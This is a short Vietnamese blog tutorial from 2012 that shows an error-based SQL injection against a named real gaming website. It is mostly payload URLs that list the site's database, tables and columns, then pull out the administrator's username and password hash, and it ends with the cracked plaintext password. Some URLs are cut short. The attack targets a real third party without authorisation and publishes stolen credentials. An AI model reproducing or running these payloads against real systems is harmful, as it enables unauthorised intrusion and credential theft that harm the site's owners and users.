4 thg 8, 2012

[TUT] - SQL http://gametienlen.net (fake HTML)

Site này rewrite domain thành .html chứ thực ra là ASPX

Tutorial:


Get version

http://gametienlen.net/gameonline/GA...t,@@VERSION)--
-.html

Get data

http://gametienlen.net/gameonline/GA...t,DB_NAME())--
-.html

Get table

Table đầu tiên

http://gametienlen.net/gameonline/GA...chema.tables))
-- -.html
http://gametienlen.net/gameonline/GA..._Schema.tables
+where+table_name+not+in('tb_user_group'))) -- -.html

Tất cả các table

http://gametienlen.net/gameonline/GA..._Schema.tables
+where+table_name+not+in('tb_account' ,'tb_quangcao','tb_comment','tb_game_phone_type',' tb_thanhvien','tb_user_group')))-- -.html

Get column của
'tb_account'
Column đầu tiên

http://gametienlen.net/gameonline/GA...#39;tb_account
')) -- -.html

Column user va pass

http://gametienlen.net/gameonline/GA...#39;tb_account
' +and+column_name+not+in+('pass' ,'username','id_email','id_account'))) -- -.html

Get username

http://gametienlen.net/gameonline/GAME_AVATAR'+and
1=convert(int,(select top 1 username from tb_account)) -- -.html

Get password

http://gametienlen.net/gameonline/GAME_AVATAR'+and
1=convert(int,(select top 1 pass from tb_account)) -- -.html

Cuối cùng ta được:


admin|4438FC033F8AEF433F9DB5348B70E8E5


Crack pass đơn giản:

admin|123698745

Không có nhận xét nào:

Đăng nhận xét